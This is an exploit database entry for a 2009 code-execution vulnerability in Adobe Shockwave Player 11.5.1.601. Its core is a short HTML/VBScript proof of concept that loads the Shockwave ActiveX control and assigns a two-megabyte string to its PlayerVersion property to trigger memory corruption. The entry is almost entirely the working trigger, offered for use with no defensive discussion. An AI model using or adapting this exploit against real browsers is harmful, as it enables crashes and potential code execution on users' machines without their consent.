Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability

2009-11-04T00:00:00
ID 1337DAY-ID-9576
Type zdt
Reporter Francis Provencher
Modified 2009-11-04T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            =======================================================================
Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability
=======================================================================


# Title: Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Francis Provencher
# Published: 2009-11-04
# Verified: yes


view source
print?
<html>
 
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
 
argCount = 1
 
arg1=String(2097152, "A")
 
ShockW.PlayerVersion = arg1
 
</script>




#  0day.today [2018-04-14]  #